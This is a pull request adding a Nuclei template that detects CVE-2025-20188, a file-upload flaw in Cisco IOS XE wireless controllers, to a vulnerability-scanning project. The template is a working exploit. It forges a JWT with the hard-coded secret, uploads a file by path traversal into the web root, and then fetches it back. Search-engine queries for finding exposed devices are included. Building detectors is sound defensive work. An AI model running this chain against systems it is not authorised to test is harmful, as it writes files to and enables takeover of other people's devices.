### PR TITLE
feature: Add detection of CVE-2025-20188.

### DIFF
--- a/README.md
+++ b/README.md
@@ -150,6 +150,7 @@ For the moment, we are currently focused on the CISA KEV Database and Google Tsu
 | CVE-2025-4322                                           |      ✅      | Custom Exploit by Ostorlab: included in Agent Asteroid. |   2025-05-20   | 
 | CVE-2025-32756                                          |      ✅      | Custom Exploit by Ostorlab: included in Agent Asteroid. |   2025-05-13   | 
 | CVE-2025-4427                                           |      ✅      | Official Nuclei template.                               |   2025-05-13   | 
+| CVE-2025-20188                                          |      ✅      | Official Nuclei template (modified by Ostorlab).        |   2025-05-07   | 
 | CVE-2025-32432                                          |      ✅      | Official Nuclei template.                               |   2025-04-25   | 
 | CVE-2025-34028                                          |      ✅      | Official Nuclei template.                               |   2025-04-22   | 
 | CVE-2025-28367                                          |      ✅      | Official Nuclei template.                               |   2025-04-21   | 

--- a/agent_group.yaml
+++ b/agent_group.yaml
@@ -336,6 +336,7 @@ agents:
             - https://raw.githubusercontent.com/Ostorlab/known_exploited_vulnerbilities_detectors/main/nuclei/CVE-2025-4427.yaml
             - https://raw.githubusercontent.com/Ostorlab/known_exploited_vulnerbilities_detectors/main/nuclei/CVE-2024-38475.yaml
             - https://raw.githubusercontent.com/Ostorlab/known_exploited_vulnerbilities_detectors/main/nuclei/CVE-2022-0783.yaml
+            - https://raw.githubusercontent.com/Ostorlab/known_exploited_vulnerbilities_detectors/main/nuclei/CVE-2025-20188.yaml
       - name: use_default_templates
         type: boolean
         description: use nuclei's default templates to scan.

--- a/nuclei/CVE-2025-20188.yaml
+++ b/nuclei/CVE-2025-20188.yaml
@@ -1,0 +1,91 @@
+id: CVE-2025-20188
+
+info:
+  name: Cisco IOS XE WLC - Arbitrary File Upload
+  author: iamnoooob,pdresearch,DhiyaneshDK
+  severity: critical
+  description: |
+    A vulnerability in the Out-of-Band Access Point (AP) Image Download feature of Cisco IOS XE Software for Wireless LAN Controllers (WLCs) could allow an unauthenticated, remote attacker to upload arbitrary files to an affected system.This vulnerability is due to the presence of a hard-coded JSON Web Token (JWT) on an affected system.An attacker could exploit this vulnerability by sending crafted HTTPS requests to the AP image download interface. A successful exploit could allow the attacker to upload files, perform path traversal, and execute arbitrary commands with root privileges.
+  reference:
+    - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-wlc-file-uplpd-rHZG9UfC
+    - https://horizon3.ai/attack-research/attack-blogs/cisco-ios-xe-wlc-arbitrary-file-upload-vulnerability-cve-2025-20188-analysis/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10
+    cve-id: CVE-2025-20188
+    cwe-id: CWE-798
+    epss-score: 0.00202
+    epss-percentile: 0.42898
+  metadata:
+    verified: true
+    max-request: 3
+    fofa-query: '"IOS-Self-Signed-Certificate" && port="8443"'
+    shodan-query: http.html_hash:1076109428 ssl.cert.issuer.cn:"IOS-Self-Signed-Certificate" port:8443
+  tags: cve,cve2025,cisco,file-upload,intrusive,rce
+
+flow: |
+  if (http(1)) {
+    http(2) && http(3)
+  }
+
+variables:
+  exp: "{{unix_time(10000)}}"
+  secret: "notfound"
+  payload: '{"reqid":"cdb_token_request_id1","exp":{{exp}}}'
+  filename: "{{randbase(8)}}"
+  path: "/usr/binos/openresty/nginx/html/"
+  string: "{{to_lower('{{randstr}}')}}"
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/ap_spec_rec/upload/"
+    headers:
+      Cookie: "jwt={{randstr}}"
+      Content-Type: "multipart/form-data; boundary=------------------------NCpI6tN3BZW3fz1Y9t2bkf"
+      Accept-Encoding: "gzip"
+    body: |
+      --------------------------NCpI6tN3BZW3fz1Y9t2bkf
+      Content-Disposition: form-data; name="file"; filename="../..{{path}}{{filename}}.txt"
+      Content-Type: text/plain
+
+      {{string}}
+      --------------------------NCpI6tN3BZW3fz1Y9t2bkf--
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 401"
+          - "contains(body, 'signature mismatch')"
+        condition: and
+        internal: true
+
+  - method: POST
+    path:
+      - "{{BaseURL}}/ap_spec_rec/upload/"
+    headers:
+      Cookie: "jwt={{ generate_jwt(payload,\"HS256\",secret) }}"
+      Content-Type: "multipart/form-data; boundary=------------------------NCpI6tN3BZW3fz1Y9t2bkf"
+      Accept-Encoding: "gzip"
+    body: |
+      --------------------------NCpI6tN3BZW3fz1Y9t2bkf
+      Content-Disposition: form-data; name="file"; filename="../..{{path}}{{filename}}.txt"
+      Content-Type: text/plain
+
+      {{string}}
+      --------------------------NCpI6tN3BZW3fz1Y9t2bkf--
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "contains(header, 'openresty')"
+        condition: and
+
+  - method: GET
+    path:
+      - "{{BaseURL}}/{{filename}}.txt"
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "contains(body, '{{string}}')"
+        condition: and


### PR DESCRIPTION
# Add CVE-2025-20188: Cisco IOS XE WLC - Arbitrary File Upload

## Description
This PR adds a Nuclei template for **CVE-2025-20188**, a critical vulnerability in the Out-of-Band Access Point (AP) Image Download feature of Cisco IOS XE Software for Wireless LAN Controllers (WLCs). This vulnerability allows unauthenticated, remote attackers to upload arbitrary files to affected systems due to the presence of a hard-coded JSON Web Token (JWT).

## Vulnerability Details
- **CVE ID**: CVE-2025-20188
- **CVSS Score**: 10.0 (Critical)
- **CWE**: CWE-798 (Use of Hard-coded Credentials)
- **Impact**: Remote code execution with root privileges via arbitrary file upload and path traversal

## Testing Results
- ✅ **500 random websites tested**: 0 false positives reported
- ✅ **Dozens of Cisco IOS XE systems tested**: No vulnerabilities detected
  - Systems were either running patched versions or had the **Out-of-Band Access Point (AP) Image Download feature** disabled

## References
- [Cisco Security Advisory](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-wlc-file-uplpd-rHZG9UfC)
- [Horizon3.ai Technical Analysis](https://horizon3.ai/attack-research/attack-blogs/cisco-ios-xe-wlc-arbitrary-file-upload-vulnerability-cve-2025-20188-analysis/)